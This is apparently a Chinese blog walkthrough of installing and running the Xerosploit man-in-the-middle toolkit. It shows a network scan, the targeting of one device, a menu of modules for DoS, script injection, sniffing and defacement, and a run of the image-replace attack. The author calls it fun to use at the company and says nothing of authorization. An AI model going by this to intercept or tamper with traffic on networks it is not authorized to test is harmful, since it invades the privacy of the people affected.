中间人攻击工具(Xerosploit)

简介

Xerosploit是一个渗透测试工具包,它的目的是实现中间人攻击。它附带着各种有效的攻击模块,并且还允许执行拒绝服务攻击和端口扫描

安装

  • 下载 git clone https://github.com/LionSec/xerosploit.git
  • 安装 cd xerosploit && sudo python install.py
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
[email protected]:~# cd xerosploit && sudo python install.py
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                     Xerosploit Installer                     █
█                                                              █
└══════════════════════════════════════════════════════════════┘     
[++] Please choose your operating system.
1) Ubuntu / Kali linux / Others
2) Parrot OS
>>> 1

输入对应的系统就可以自动安装了 Xerosploit has been sucessfuly instaled. Execute 'xerosploit' in your terminal. 显示这个表示安装成功

使用

输入 xerosploit 打开工具

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38


██╗  ██╗███████╗██████╗  ██████╗ ███████╗██████╗ ██╗      ██████╗ ██╗████████╗
╚██╗██╔╝██╔════╝██╔══██╗██╔═══██╗██╔════╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
 ╚███╔╝ █████╗  ██████╔╝██║   ██║███████╗██████╔╝██║     ██║   ██║██║   ██║   
 ██╔██╗ ██╔══╝  ██╔══██╗██║   ██║╚════██║██╔═══╝ ██║     ██║   ██║██║   ██║   
██╔╝ ██╗███████╗██║  ██║╚██████╔╝███████║██║     ███████╗╚██████╔╝██║   ██║   
╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝ ╚══════╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝                                                      


[+]═══════════[ Author : @LionSec1 _-\|/-_ Website: lionsec.net ]═══════════[+]

                      [ Powered by Bettercap and Nmap ]
 
┌═════════════════════════════════════════════════════════════════════════════┐
█                                                                             █
█                         Your Network Configuration                          █ 
█                                                                             █
└═════════════════════════════════════════════════════════════════════════════┘     
 
╒══════════════╤═══════════════════╤═══════════╤═════════╤════════════╕
│  IP Address  │    MAC Address    │  Gateway  │  Iface  │  Hostname  │
╞══════════════╪═══════════════════╪═══════════╪═════════╪════════════╡
│              │                   │           │         │            │
├──────────────┼───────────────────┼───────────┼─────────┼────────────┤
│   1.1.1.11   │ 08:00:27:7B:3D:E7 │  1.1.1.1  │  eth0   │    kali    │
╘══════════════╧═══════════════════╧═══════════╧═════════╧════════════╛

╔═════════════╦════════════════════════════════════════════════════════════════════╗
║             ║ XeroSploit is a penetration testing toolkit whose goal is to       ║
║ Information ║ perform man in the middle attacks for testing purposes.            ║
║             ║ It brings various modules that allow to realise efficient attacks. ║
║             ║ This tool is Powered by Bettercap and Nmap.                        ║
╚═════════════╩════════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮ 

如果你要实现中间人攻击,比如你要让受害者访问的网站的图片全部变为固定的一张照片,你可以这样做 输入help查看下菜单选项

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Xero ➮ help

╔══════════╦════════════════════════════════════════════════════════════════╗
║          ║                                                                ║
║          ║ scan     :  Map your network.                                  ║
║          ║                                                                ║
║          ║ iface    :  Manually set your network interface.               ║
║ COMMANDS ║                                                                ║
║          ║ gateway  :  Manually set your gateway.                         ║
║          ║                                                                ║
║          ║ start    :  Skip scan and directly set your target IP address. ║
║          ║                                                                ║
║          ║ rmlog    :  Delete all xerosploit logs.                        ║
║          ║                                                                ║
║          ║ help     :  Display this help message.                         ║
║          ║                                                                ║
║          ║ exit     :  Close Xerosploit.                                  ║
║          ║                                                                ║
╚══════════╩════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮ 

输入scan扫描一下网络

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
Xero ➮ scan

[++] Mapping your network ... 

[+]═══════════[ Devices found on your network ]═══════════[+]

╔════════════╦═══════════════════╦══════════════════════════════╗
║ IP Address ║ Mac Address       ║ Manufacturer                 ║
╠════════════╬═══════════════════╬══════════════════════════════╣
║ 1.1.1.1    ║ B8:F8:83:76:7E:E5 ║ (Tp-link Technologies)║ 1.1.1.2    ║ A0:8C:FD:D1:2C:C6 ║ (Hewlett Packard)║ 1.1.1.3    ║ A0:8C:FD:D2:25:B8 ║ (Hewlett Packard)║ 1.1.1.5    ║ C0:CC:F8:42:DD:D5 ║ (Apple)║ 1.1.1.6    ║ A0:8C:FD:D1:E1:8E ║ (Hewlett Packard)║ 1.1.1.7    ║ A0:8C:FD:D5:81:DD ║ (Hewlett Packard)║ 1.1.1.9    ║ C8:6F:1D:22:37:A2 ║ (Apple)║ 1.1.1.10   ║ 08:00:37:A1:64:05 ║ (Fuji-xerox)║ 1.1.1.12   ║ 7C:DD:90:DE:A1:34 ║ (Shenzhen OgemrayTechnology)║ 1.1.1.14   ║ B0:E2:35:43:62:43 ║ (Xiaomi Communications)║ 1.1.1.11   ║ 08:00:27:7B:3D:E7 ║ (This device)║ 1.1.1.254  ║                   ║                              ║
║            ║                   ║                              ║
╚════════════╩═══════════════════╩══════════════════════════════╝

[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.

Xero ➮ 

扫描的信息很详细,连一些基础的设备信息都扫描出来了 接下来输入各种信息,看下面就好

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
Xero ➮ 1.1.1.12

[++] 1.1.1.12 has been targeted. 

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮ help

╔═════════╦══════════════════════════════════════════════════════════════════════╗
║         ║                                                                      ║
║         ║ pscan       :  Port Scanner                                          ║
║         ║                                                                      ║
║         ║ dos         :  DoS Attack                                            ║
║         ║                                                                      ║
║         ║ ping        :  Ping Request                                          ║
║         ║                                                                      ║
║         ║ injecthtml  :  Inject Html code                                      ║
║         ║                                                                      ║
║         ║ injectjs    :  Inject Javascript code                                ║
║         ║                                                                      ║
║         ║ rdownload   :  Replace files being downloaded                        ║
║         ║                                                                      ║
║         ║ sniff       :  Capturing information inside network packets          ║
║ MODULES ║                                                                      ║
║         ║ dspoof      :  Redirect all the http traffic to the specified one IP ║
║         ║                                                                      ║
║         ║ yplay       :  Play background sound in target browser               ║
║         ║                                                                      ║
║         ║ replace     :  Replace all web pages images with your own one        ║
║         ║                                                                      ║
║         ║ driftnet    :  View all images requested by your targets             ║
║         ║                                                                      ║
║         ║ move        :  Shaking Web Browser content                           ║
║         ║                                                                      ║
║         ║ deface      :  Overwrite all web pages with your HTML code           ║
║         ║                                                                      ║
╚═════════╩══════════════════════════════════════════════════════════════════════╝

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮ replace
 
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                          Image Replace                       █
█                                                              █
█        Replace all web pages images with your own one        █
└══════════════════════════════════════════════════════════════┘     

[+] Enter 'run' to execute the 'replace' command.

Xero»modules»replace ➮ run

[+] Insert your image path. (e.g. /home/capitansalami/pictures/fun.png)

Xero»modules»replace ➮ /root/a.png

[++] All images will be replaced by /root/a.png

[++] Press 'Ctrl + C' to stop . 

效果类似下面这样

评价

在公司里还是挺好玩的,好评,各种中间人攻击的东西几乎都有

Having Fun